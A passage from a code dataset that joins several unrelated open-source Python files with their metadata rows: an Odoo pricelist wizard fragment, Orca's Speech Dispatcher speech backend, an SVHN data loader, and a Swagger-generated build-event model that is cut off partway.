('partner','=',partner_code),
])
if invoice_line_ids:
list_quotation = "%20s%20s%20s%20s\n" % (
"Data","Fattura","Prezzo", "Q.")
for line in self.pool.get('micronaet.invoice.line').browse(
cr, uid, invoice_line_ids):
list_quotation += "%20s%20s%20s%20s\n" % (
datetime.strptime(line.date, '%Y%m%d').strftime(
'%d/%m/%Y'), line.name, line.price, line.quantity)
res['value']['price_invoice_history'] = list_quotation
else:
res['value']['price_invoice_history'] = ""
return res
# Azzero tutto:
return {'value': {
'price': False,
'price_model_history': False,
'price_model': False,
'price_history': False,
'price_invoice_history': False,
}}
# event function
def do_insert_quotation(self, cr, uid, ids, context=None):
""" Create or update pricelist if non custom and add personalization
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
customer_proxy = self.pool.get('res.partner').browse(
cr, uid, wiz_browse.partner_id.id)
pricelist_org_id = wiz_browse.pricelist_id.id # old pricelist set up
pricelist_proxy = self.pool.get('product.pricelist').browse(
cr, uid, pricelist_org_id)
if not pricelist_proxy.customized: # Create customized and first rule
update = False
pricelist_ref_id = self.pool.get('product.pricelist').create(
cr, uid, {
'name': "Personal: " + customer_proxy.name,
'type': 'sale',
'customized': True,
})
if pricelist_ref_id:
version_ref_id = self.pool.get(
'product.pricelist.version').create(
cr, uid, {
'name': "From " + \
customer_proxy.property_product_pricelist.name,
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
'pricelist_id': pricelist_ref_id, #appena creato
})
else:
pass # TODO comunicate error
else: # yet custom pricelist
update = True
pricelist_ref_id = customer_proxy.property_product_pricelist.id
# TODO take the first for now!
version_ref_id = \
customer_proxy.property_product_pricelist.version_id[0].id
if not (pricelist_ref_id and version_ref_id):
# TODO comunicate error!
return {'type': 'ir.actions.act_window_close'}
pricelist_item_pool = self.pool.get('product.pricelist.item')
# ultima regola per prendere come riferimento il listino precedente
if not update: # Create ref. pricelist only for first new!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
'sequence': 500, # ultima
'price_max_margin': 0.0,
'base': 2, # pricelist version
'price_version_id': version_ref_id, #owner version
'min_quantity': 1,
'price_surcharge': 0.0,
'base_pricelist_id': pricelist_ref_id,
'name': "Listino rif: " + \
customer_proxy.property_product_pricelist.name,
})
# Creo la regola in base a prezzo e prodotto attuale
# TODO cercare se esiste già!!!!!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
'sequence': 10, # tra le prime
'price_max_margin': 0.0,
'product_id': wiz_browse.product_id.id,
'base': 1,
'price_version_id': version_ref_id,
'min_quantity': 1,
'price_surcharge': wiz_browse.price,
'name': "[%s] %s" % (
wiz_browse.product_id.code,
wiz_browse.product_id.name),
})
# Set up partner with new pricelist
self.pool.get('res.partner').write(cr, uid, [wiz_browse.partner_id.id],
{'property_product_pricelist': pricelist_ref_id})
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -7,251,331,763,021,639,000 | 40.988506 | 79 | 0.528552 | false |
GNOME/orca | src/orca/speechdispatcherfactory.py | 1 | 27427 | # Copyright 2006, 2007, 2008, 2009 Brailcom, o.p.s.
#
# Author: Tomas Cerha <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
# # [[[TODO: richb - Pylint is giving us a bunch of warnings along these
# lines throughout this file:
#
# W0142:202:SpeechServer._send_command: Used * or ** magic
#
# So for now, we just disable these warnings in this module.]]]
#
# pylint: disable-msg=W0142
"""Provides an Orca speech server for Speech Dispatcher backend."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__author__ = "Tomas Cerha <[email protected]>"
__copyright__ = "Copyright (c) 2006-2008 Brailcom, o.p.s."
__license__ = "LGPL"
from gi.repository import GLib
import re
import time
from . import chnames
from . import debug
from . import guilabels
from . import messages
from . import speechserver
from . import settings
from . import orca_state
from . import punctuation_settings
from . import settings_manager
from .acss import ACSS
_settingsManager = settings_manager.getManager()
try:
import speechd
except:
_speechd_available = False
else:
_speechd_available = True
try:
getattr(speechd, "CallbackType")
except AttributeError:
_speechd_version_ok = False
else:
_speechd_version_ok = True
PUNCTUATION = re.compile(r'[^\w\s]', re.UNICODE)
ELLIPSIS = re.compile('(\342\200\246|(?<!\\.)\\.{3,4}(?=(\\s|\\Z)))')
class SpeechServer(speechserver.SpeechServer):
# See the parent class for documentation.
_active_servers = {}
DEFAULT_SERVER_ID = 'default'
_SERVER_NAMES = {DEFAULT_SERVER_ID: guilabels.DEFAULT_SYNTHESIZER}
@staticmethod
def getFactoryName():
return guilabels.SPEECH_DISPATCHER
@staticmethod
def getSpeechServers():
servers = []
default = SpeechServer._getSpeechServer(SpeechServer.DEFAULT_SERVER_ID)
if default is not None:
servers.append(default)
for module in default.list_output_modules():
servers.append(SpeechServer._getSpeechServer(module))
return servers
@classmethod
def _getSpeechServer(cls, serverId):
"""Return an active server for given id.
Attempt to create the server if it doesn't exist yet. Returns None
when it is not possible to create the server.
"""
if serverId not in cls._active_servers:
cls(serverId)
# Don't return the instance, unless it is successfully added
# to `_active_Servers'.
return cls._active_servers.get(serverId)
@staticmethod
def getSpeechServer(info=None):
thisId = info[1] if info is not None else SpeechServer.DEFAULT_SERVER_ID
return SpeechServer._getSpeechServer(thisId)
@staticmethod
def shutdownActiveServers():
servers = [s for s in SpeechServer._active_servers.values()]
for server in servers:
server.shutdown()
# *** Instance methods ***
def __init__(self, serverId):
super(SpeechServer, self).__init__()
self._id = serverId
self._client = None
self._current_voice_properties = {}
self._acss_manipulators = (
(ACSS.RATE, self._set_rate),
(ACSS.AVERAGE_PITCH, self._set_pitch),
(ACSS.GAIN, self._set_volume),
(ACSS.FAMILY, self._set_family),
)
if not _speechd_available:
msg = 'ERROR: Speech Dispatcher is not available'
debug.println(debug.LEVEL_WARNING, msg, True)
return
if not _speechd_version_ok:
msg = 'ERROR: Speech Dispatcher version 0.6.2 or later is required.'
debug.println(debug.LEVEL_WARNING, msg, True)
return
# The following constants must be initialized in runtime since they
# depend on the speechd module being available.
try:
most = speechd.PunctuationMode.MOST
except:
most = speechd.PunctuationMode.SOME
self._PUNCTUATION_MODE_MAP = {
settings.PUNCTUATION_STYLE_ALL: speechd.PunctuationMode.ALL,
settings.PUNCTUATION_STYLE_MOST: most,
settings.PUNCTUATION_STYLE_SOME: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_NONE: speechd.PunctuationMode.NONE,
}
self._CALLBACK_TYPE_MAP = {
speechd.CallbackType.BEGIN: speechserver.SayAllContext.PROGRESS,
speechd.CallbackType.CANCEL: speechserver.SayAllContext.INTERRUPTED,
speechd.CallbackType.END: speechserver.SayAllContext.COMPLETED,
speechd.CallbackType.INDEX_MARK:speechserver.SayAllContext.PROGRESS,
}
self._default_voice_name = guilabels.SPEECH_DEFAULT_VOICE % serverId
try:
self._init()
except:
debug.printException(debug.LEVEL_WARNING)
msg = 'ERROR: Speech Dispatcher service failed to connect'
debug.println(debug.LEVEL_WARNING, msg, True)
else:
SpeechServer._active_servers[serverId] = self
self._lastKeyEchoTime = None
def _init(self):
self._client = client = speechd.SSIPClient('Orca', component=self._id)
client.set_priority(speechd.Priority.MESSAGE)
if self._id != self.DEFAULT_SERVER_ID:
client.set_output_module(self._id)
self._current_voice_properties = {}
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
client.set_punctuation(mode)
client.set_data_mode(speechd.DataMode.SSML)
def updateCapitalizationStyle(self):
"""Updates the capitalization style used by the speech server."""
if settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_ICON:
style = 'icon'
elif settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_SPELL:
style = 'spell'
else:
style = 'none'
try:
self._client.set_cap_let_recogn(style)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
self._client.set_cap_let_recogn(style)
except:
pass
def updatePunctuationLevel(self):
""" Punctuation level changed, inform this speechServer. """
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
self._client.set_punctuation(mode)
def _send_command(self, command, *args, **kwargs):
try:
return command(*args, **kwargs)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
return command(*args, **kwargs)
except:
pass
def _set_rate(self, acss_rate):
rate = int(2 * max(0, min(99, acss_rate)) - 98)
self._send_command(self._client.set_rate, rate)
def _set_pitch(self, acss_pitch):
pitch = int(20 * max(0, min(9, acss_pitch)) - 90)
self._send_command(self._client.set_pitch, pitch)
def _set_volume(self, acss_volume):
volume = int(15 * max(0, min(9, acss_volume)) - 35)
self._send_command(self._client.set_volume, volume)
def _get_language_and_dialect(self, acss_family):
if acss_family is None:
acss_family = {}
language = acss_family.get(speechserver.VoiceFamily.LANG)
dialect = acss_family.get(speechserver.VoiceFamily.DIALECT)
if not language:
import locale
familyLocale, encoding = locale.getdefaultlocale()
language, dialect = '', ''
if familyLocale:
localeValues = familyLocale.split('_')
language = localeValues[0]
if len(localeValues) == 2:
dialect = localeValues[1]
return language, dialect
def _set_family(self, acss_family):
lang, dialect = self._get_language_and_dialect(acss_family)
if lang:
self._send_command(self._client.set_language, lang)
if dialect:
# Try to set precise dialect
self._send_command(self._client.set_language, lang + '-' + dialect)
try:
# This command is not available with older SD versions.
set_synthesis_voice = self._client.set_synthesis_voice
except AttributeError:
pass
else:
name = acss_family.get(speechserver.VoiceFamily.NAME)
self._send_command(set_synthesis_voice, name)
def _debug_sd_values(self, prefix=""):
if debug.debugLevel > debug.LEVEL_INFO:
return
try:
sd_rate = self._send_command(self._client.get_rate)
sd_pitch = self._send_command(self._client.get_pitch)
sd_volume = self._send_command(self._client.get_volume)
sd_language = self._send_command(self._client.get_language)
except:
sd_rate = sd_pitch = sd_volume = sd_language = "(exception occurred)"
family = self._current_voice_properties.get(ACSS.FAMILY)
styles = {settings.PUNCTUATION_STYLE_NONE: "NONE",
settings.PUNCTUATION_STYLE_SOME: "SOME",
settings.PUNCTUATION_STYLE_MOST: "MOST",
settings.PUNCTUATION_STYLE_ALL: "ALL"}
current = self._current_voice_properties
msg = "SPEECH DISPATCHER: %s\n" \
"ORCA rate %s, pitch %s, volume %s, language %s, punctuation: %s \n" \
"SD rate %s, pitch %s, volume %s, language %s" % \
(prefix,
self._current_voice_properties.get(ACSS.RATE),
self._current_voice_properties.get(ACSS.AVERAGE_PITCH),
self._current_voice_properties.get(ACSS.GAIN),
self._get_language_and_dialect(family)[0],
styles.get(_settingsManager.getSetting("verbalizePunctuationStyle")),
sd_rate,
sd_pitch,
sd_volume,
sd_language)
debug.println(debug.LEVEL_INFO, msg, True)
def _apply_acss(self, acss):
if acss is None:
acss = settings.voices[settings.DEFAULT_VOICE]
current = self._current_voice_properties
for acss_property, method in self._acss_manipulators:
value = acss.get(acss_property)
if value is not None:
if current.get(acss_property) != value:
method(value)
current[acss_property] = value
elif acss_property == ACSS.AVERAGE_PITCH:
method(5.0)
current[acss_property] = 5.0
elif acss_property == ACSS.GAIN:
method(10)
current[acss_property] = 5.0
elif acss_property == ACSS.RATE:
method(50)
current[acss_property] = 5.0
elif acss_property == ACSS.FAMILY:
method({})
current[acss_property] = {}
def __addVerbalizedPunctuation(self, oldText):
"""Depending upon the users verbalized punctuation setting,
adjust punctuation symbols in the given text to their pronounced
equivalents. The pronounced text will either replace the
punctuation symbol or be inserted before it. In the latter case,
this is to retain spoken prosity.
Arguments:
- oldText: text to be parsed for punctuation.
Returns a text string with the punctuation symbols adjusted accordingly.
"""
style = _settingsManager.getSetting("verbalizePunctuationStyle")
if style == settings.PUNCTUATION_STYLE_NONE:
return oldText
spokenEllipsis = messages.SPOKEN_ELLIPSIS + " "
newText = re.sub(ELLIPSIS, spokenEllipsis, oldText)
symbols = set(re.findall(PUNCTUATION, newText))
for symbol in symbols:
try:
level, action = punctuation_settings.getPunctuationInfo(symbol)
except:
continue
if level != punctuation_settings.LEVEL_NONE:
# Speech Dispatcher should handle it.
#
continue
charName = " %s " % chnames.getCharacterName(symbol)
if action == punctuation_settings.PUNCTUATION_INSERT:
charName += symbol
newText = re.sub(symbol, charName, newText)
if orca_state.activeScript:
newText = orca_state.activeScript.utilities.adjustForDigits(newText)
return newText
def _speak(self, text, acss, **kwargs):
if isinstance(text, ACSS):
text = ''
# Mark beginning of words with U+E000 (private use) and record the
# string offsets
# Note: we need to do this before disturbing the text offsets
# Note2: we assume that text mangling below leave U+E000 untouched
last_begin = None
last_end = None
is_numeric = None
marks_offsets = []
marks_endoffsets = []
marked_text = ""
for i in range(len(text)):
c = text[i]
if c == '\ue000':
# Original text already contains U+E000. But syntheses will not
# know what to do of it anyway, so discard it
continue
if not c.isspace() and last_begin == None:
# Word begin
marked_text += '\ue000'
last_begin = i
is_numeric = c.isnumeric()
elif c.isspace() and last_begin != None:
# Word end
if is_numeric:
# We had a wholy numeric word, possibly next word is as well.
# Skip to next word
for j in range(i+1, len(text)):
if not text[j].isspace():
break
else:
is_numeric = False
# Check next word
while is_numeric and j < len(text) and not text[j].isspace():
if not text[j].isnumeric():
is_numeric = False
j += 1
if not is_numeric:
# add a mark
marks_offsets.append(last_begin)
marks_endoffsets.append(i)
last_begin = None
is_numeric = None
elif is_numeric and not c.isnumeric():
is_numeric = False
marked_text += c
if last_begin != None:
# Finished with a word
marks_offsets.append(last_begin)
marks_endoffsets.append(i + 1)
text = marked_text
text = self.__addVerbalizedPunctuation(text)
if orca_state.activeScript:
text = orca_state.activeScript.\
utilities.adjustForPronunciation(text)
# Replace no break space characters with plain spaces since some
# synthesizers cannot handle them. See bug #591734.
#
text = text.replace('\u00a0', ' ')
# Replace newline followed by full stop, since
# this seems to crash sd, see bgo#618334.
#
text = text.replace('\n.', '\n')
# Transcribe to SSML, translating U+E000 into marks
# Note: we need to do this after all mangling otherwise the ssml markup
# would get mangled too
ssml = "<speak>"
i = 0
for c in text:
if c == '\ue000':
if i >= len(marks_offsets):
# This is really not supposed to happen
msg = "%uth U+E000 does not have corresponding index" % i
debug.println(debug.LEVEL_WARNING, msg, True)
else:
ssml += '<mark name="%u:%u"/>' % (marks_offsets[i], marks_endoffsets[i])
i += 1
# Disable for now, until speech dispatcher properly parses them (version 0.8.9 or later)
#elif c == '"':
# ssml += '"'
#elif c == "'":
# ssml += '''
elif c == '<':
ssml += '<'
elif c == '>':
ssml += '>'
elif c == '&':
ssml += '&'
else:
ssml += c
ssml += "</speak>"
self._apply_acss(acss)
self._debug_sd_values("Speaking '%s' " % ssml)
self._send_command(self._client.speak, ssml, **kwargs)
def _say_all(self, iterator, orca_callback):
"""Process another sayAll chunk.
Called by the gidle thread.
"""
try:
context, acss = next(iterator)
except StopIteration:
pass
else:
def callback(callbackType, index_mark=None):
# This callback is called in Speech Dispatcher listener thread.
# No subsequent Speech Dispatcher interaction is allowed here,
# so we pass the calls to the gidle thread.
t = self._CALLBACK_TYPE_MAP[callbackType]
if t == speechserver.SayAllContext.PROGRESS:
if index_mark:
index = index_mark.split(':')
if len(index) >= 2:
start, end = index[0:2]
context.currentOffset = context.startOffset + int(start)
context.currentEndOffset = context.startOffset + int(end)
msg = "SPEECH DISPATCHER: Got mark %d:%d / %d-%d" % \
(context.currentOffset, context.currentEndOffset, \
context.startOffset, context.endOffset)
debug.println(debug.LEVEL_INFO, msg, True)
else:
context.currentOffset = context.startOffset
context.currentEndOffset = None
elif t == speechserver.SayAllContext.COMPLETED:
context.currentOffset = context.endOffset
context.currentEndOffset = None
GLib.idle_add(orca_callback, context, t)
if t == speechserver.SayAllContext.COMPLETED:
GLib.idle_add(self._say_all, iterator, orca_callback)
self._speak(context.utterance, acss, callback=callback,
event_types=list(self._CALLBACK_TYPE_MAP.keys()))
return False # to indicate, that we don't want to be called again.
def _cancel(self):
self._send_command(self._client.cancel)
def _change_default_speech_rate(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
rate = acss[ACSS.RATE]
except KeyError:
rate = 50
acss[ACSS.RATE] = max(0, min(99, rate + delta))
msg = 'SPEECH DISPATCHER: Rate set to %d' % rate
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SLOWER \
or messages.SPEECH_FASTER, acss=acss)
def _change_default_speech_pitch(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
pitch = acss[ACSS.AVERAGE_PITCH]
except KeyError:
pitch = 5
acss[ACSS.AVERAGE_PITCH] = max(0, min(9, pitch + delta))
msg = 'SPEECH DISPATCHER: Pitch set to %d' % pitch
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_LOWER \
or messages.SPEECH_HIGHER, acss=acss)
def _change_default_speech_volume(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
volume = acss[ACSS.GAIN]
except KeyError:
volume = 10
acss[ACSS.GAIN] = max(0, min(9, volume + delta))
msg = 'SPEECH DISPATCHER: Volume set to %d' % volume
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SOFTER \
or messages.SPEECH_LOUDER, acss=acss)
def getInfo(self):
return [self._SERVER_NAMES.get(self._id, self._id), self._id]
def getVoiceFamilies(self):
# Always offer the configured default voice with a language
# set according to the current locale.
from locale import getlocale, LC_MESSAGES
locale = getlocale(LC_MESSAGES)[0]
if locale is None or locale == 'C':
locale_language = None
else:
locale_lang, locale_dialect = locale.split('_')
locale_language = locale_lang + '-' + locale_dialect
voices = ()
try:
# This command is not available with older SD versions.
list_synthesis_voices = self._client.list_synthesis_voices
except AttributeError:
pass
else:
try:
voices += self._send_command(list_synthesis_voices)
except:
pass
default_lang = ""
if locale_language:
# Check whether how it appears in the server list
for name, lang, variant in voices:
if lang == locale_language:
default_lang = locale_language
break
if not default_lang:
for name, lang, variant in voices:
if lang == locale_lang:
default_lang = locale_lang
if not default_lang:
default_lang = locale_language
voices = ((self._default_voice_name, default_lang, None),) + voices
families = []
for name, lang, variant in voices:
families.append(speechserver.VoiceFamily({ \
speechserver.VoiceFamily.NAME: name,
#speechserver.VoiceFamily.GENDER: speechserver.VoiceFamily.MALE,
speechserver.VoiceFamily.LANG: lang.partition("-")[0],
speechserver.VoiceFamily.DIALECT: lang.partition("-")[2],
speechserver.VoiceFamily.VARIANT: variant}))
return families
def speak(self, text=None, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
# do not result in the intial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
# "We will not interrupt a key echo in progress." (Said the comment in
# speech.py where these next two lines used to live. But the code here
# suggests we haven't been doing anything with the lastKeyEchoTime in
# years. TODO - JD: Dig into this and if it's truly useless, kill it.)
if self._lastKeyEchoTime:
interrupt = interrupt and (time.time() - self._lastKeyEchoTime) > 0.5
if text:
self._speak(text, acss)
def speakUtterances(self, utteranceList, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
# do not result in the intial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
for utterance in utteranceList:
if utterance:
self._speak(utterance, acss)
def sayAll(self, utteranceIterator, progressCallback):
GLib.idle_add(self._say_all, utteranceIterator, progressCallback)
def speakCharacter(self, character, acss=None):
self._apply_acss(acss)
name = chnames.getCharacterName(character)
if not name or name == character:
self._send_command(self._client.char, character)
return
if orca_state.activeScript:
name = orca_state.activeScript.\
utilities.adjustForPronunciation(name)
self.speak(name, acss)
def speakKeyEvent(self, event, acss=None):
event_string = event.getKeyName()
if orca_state.activeScript:
event_string = orca_state.activeScript.\
utilities.adjustForPronunciation(event_string)
lockingStateString = event.getLockingStateString()
event_string = "%s %s" % (event_string, lockingStateString)
self.speak(event_string, acss=acss)
self._lastKeyEchoTime = time.time()
def increaseSpeechRate(self, step=5):
self._change_default_speech_rate(step)
def decreaseSpeechRate(self, step=5):
self._change_default_speech_rate(step, decrease=True)
def increaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step)
def decreaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step, decrease=True)
def increaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step)
def decreaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step, decrease=True)
def stop(self):
self._cancel()
def shutdown(self):
self._client.close()
del SpeechServer._active_servers[self._id]
def reset(self, text=None, acss=None):
self._client.close()
self._init()
def list_output_modules(self):
"""Return names of available output modules as a tuple of strings.
This method is not a part of Orca speech API, but is used internally
by the Speech Dispatcher backend.
The returned tuple can be empty if the information can not be
obtained (e.g. with an older Speech Dispatcher version).
"""
try:
return self._send_command(self._client.list_output_modules)
except AttributeError:
return ()
except speechd.SSIPCommandError:
return ()
| lgpl-2.1 | -4,297,985,001,126,757,000 | 37.359441 | 100 | 0.584096 | false |
googleinterns/out-of-distribution | src/datasets/load_svhn.py | 1 | 2077 | import multiprocessing
import os
from typing import Union
import torchvision
from torch.utils.data import DataLoader, ConcatDataset, Subset
from torchvision import transforms
from root import from_root
from src.misc.utils import read_lines
DATA_DIRPATH = from_root("data/svhn")
SPLIT_DIRPATH = from_root("splits/svhn")
SVHN_TRAIN_MEAN = [0.4310, 0.4303, 0.4464]
SVHN_TRAIN_STD = [0.1965, 0.1983, 0.1994]
def load_svhn_infer(split: str, batch_size: int, n_workers: Union[str, int]) -> DataLoader:
if split not in {"train", "val", "test"}:
raise ValueError("Split must be 'train', 'val', or 'test'!")
if batch_size <= 0:
raise ValueError("Batch_size must be positive!")
if type(n_workers) == str and n_workers != "n_cores":
raise ValueError("If n_workers is a string, it must be 'n_cores'!")
if type(n_workers) == int and n_workers < 0:
raise ValueError("If n_workers is an int, it must be non-negative!")
transform = transforms.ToTensor()
if split == "train":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "train.txt"), int)
dataset = Subset(dataset, indices)
elif split == "val":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "val.txt"), int)
dataset = Subset(dataset, indices)
else:
dataset = torchvision.datasets.SVHN(DATA_DIRPATH, split="test", transform=transform, download=True)
if n_workers == "n_cores":
n_workers = multiprocessing.cpu_count()
return DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=n_workers)
| apache-2.0 | -1,984,148,229,769,911,600 | 41.387755 | 107 | 0.672123 | false |
janinko/pnc-cli | pnc_cli/swagger_client/models/build_set_status_changed_event.py | 1 | 10705 | # coding: utf-8
"""
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from datetime import datetime
from pprint import pformat
from six import iteritems
import re
class BuildSetStatusChangedEvent(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'description': 'str',
'user_id': 'int',
'build_set_start_time': 'datetime',
'build_set_end_time': 'datetime',
'old_status': 'str',
'build_set_task_id': 'int',
'build_set_configuration_name': 'str',
'new_status': 'str',
'build_set_configuration_id': 'int'
}
attribute_map = {
'description': 'description',
'user_id': 'userId',
'build_set_start_time': 'buildSetStartTime',
'build_set_end_time': 'buildSetEndTime',
'old_status': 'oldStatus',
'build_set_task_id': 'buildSetTaskId',
'build_set_configuration_name': 'buildSetConfigurationName',
'new_status': 'newStatus',
'build_set_configuration_id': 'buildSetConfigurationId'
}
def __init__(self, description=None, user_id=None, build_set_start_time=None, build_set_end_time=None, old_status=None, build_set_task_id=None, build_set_configuration_name=None, new_status=None, build_set_configuration_id=None):
"""
BuildSetStatusChangedEvent - a model defined in Swagger
"""
self._description = None
self._user_id = None
self._build_set_start_time = None
self._build_set_end_time = None
self._old_status = None
self._build_set_task_id = None
self._build_set_configuration_name = None
self._new_status = None
self._build_set_configuration_id = None
if description is not None:
self.description = description
if user_id is not None:
self.user_id = user_id
if build_set_start_time is not None:
self.build_set_start_time = build_set_start_time
if build_set_end_time is not None:
self.build_set_end_time = build_set_end_time
if old_status is not None:
self.old_status = old_status
if build_set_task_id is not None:
self.build_set_task_id = build_set_task_id
if build_set_configuration_name is not None:
self.build_set_configuration_name = build_set_configuration_name
if new_status is not None:
self.new_status = new_status
if build_set_configuration_id is not None:
self.build_set_configuration_id = build_set_configuration_id
@property
def description(self):
"""
Gets the description of this BuildSetStatusChangedEvent.
:return: The description of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this BuildSetStatusChangedEvent.
:param description: The description of this BuildSetStatusChangedEvent.
:type: str
"""
self._description = description
@property
def user_id(self):
"""
Gets the user_id of this BuildSetStatusChangedEvent.
:return: The user_id of this BuildSetStatusChangedEvent.
:rtype: int
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""
Sets the user_id of this BuildSetStatusChangedEvent.
:param user_id: The user_id of this BuildSetStatusChangedEvent.
:type: int
"""
self._user_id = user_id
@property
def build_set_start_time(self):
"""
Gets the build_set_start_time of this BuildSetStatusChangedEvent.
:return: The build_set_start_time of this BuildSetStatusChangedEvent.
:rtype: datetime
"""
return self._build_set_start_time
@build_set_start_time.setter
def build_set_start_time(self, build_set_start_time):
"""
Sets the build_set_start_time of this BuildSetStatusChangedEvent.
:param build_set_start_time: The build_set_start_time of this BuildSetStatusChangedEvent.
:type: datetime
"""
self._build_set_start_time = build_set_start_time
@property
def build_set_end_time(self):
"""
Gets the build_set_end_time of this BuildSetStatusChangedEvent.
:return: The build_set_end_time of this BuildSetStatusChangedEvent.
:rtype: datetime
"""
return self._build_set_end_time
@build_set_end_time.setter
def build_set_end_time(self, build_set_end_time):
"""
Sets the build_set_end_time of this BuildSetStatusChangedEvent.
:param build_set_end_time: The build_set_end_time of this BuildSetStatusChangedEvent.
:type: datetime
"""
self._build_set_end_time = build_set_end_time
@property
def old_status(self):
"""
Gets the old_status of this BuildSetStatusChangedEvent.
:return: The old_status of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._old_status
@old_status.setter
def old_status(self, old_status):
"""
Sets the old_status of this BuildSetStatusChangedEvent.
:param old_status: The old_status of this BuildSetStatusChangedEvent.
:type: str
"""
allowed_values = ["NEW", "DONE", "REJECTED"]
if old_status not in allowed_values:
raise ValueError(
"Invalid value for `old_status` ({0}), must be one of {1}"
.format(old_status, allowed_values)
)
self._old_status = old_status
@property
def build_set_task_id(self):
"""
Gets the build_set_task_id of this BuildSetStatusChangedEvent.
:return: The build_set_task_id of this BuildSetStatusChangedEvent.
:rtype: int
"""
return self._build_set_task_id
@build_set_task_id.setter
def build_set_task_id(self, build_set_task_id):
"""
Sets the build_set_task_id of this BuildSetStatusChangedEvent.
:param build_set_task_id: The build_set_task_id of this BuildSetStatusChangedEvent.
:type: int
"""
self._build_set_task_id = build_set_task_id
@property
def build_set_configuration_name(self):
"""
Gets the build_set_configuration_name of this BuildSetStatusChangedEvent.
:return: The build_set_configuration_name of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._build_set_configuration_name
@build_set_configuration_name.setter
def build_set_configuration_name(self, build_set_configuration_name):
"""
Sets the build_set_configuration_name of this BuildSetStatusChangedEvent.
:param build_set_configuration_name: The build_set_configuration_name of this BuildSetStatusChangedEvent.
:type: str
"""
self._build_set_configuration_name = build_set_configuration_name
@property
def new_status(self):
"""
Gets the new_status of this BuildSetStatusChangedEvent.
:return: The new_status of this BuildSetStatusChangedEvent.
:rtype: str
"""
return self._new_status
@new_status.setter
def new_status(self, new_status):
"""
Sets the new_status of this BuildSetStatusChangedEvent.
:param new_status: The new_status of this BuildSetStatusChangedEvent.
:type: str
"""
allowed_values = ["NEW", "DONE", "REJECTED"]
if new_status not in allowed_values:
raise ValueError(
"Invalid value for `new_status` ({0}), must be one of {1}"
.format(new_status, allowed_values)
)
self._new_status = new_status
@property
def build_set_configuration_id(self):
"""
Gets the build_set_configuration_id of this BuildSetStatusChangedEvent.
:return: The build_set_configuration_id of this BuildSetStatusChangedEvent.
:rtype: int
"""
return self._build_set_configuration_id
@build_set_configuration_id.setter
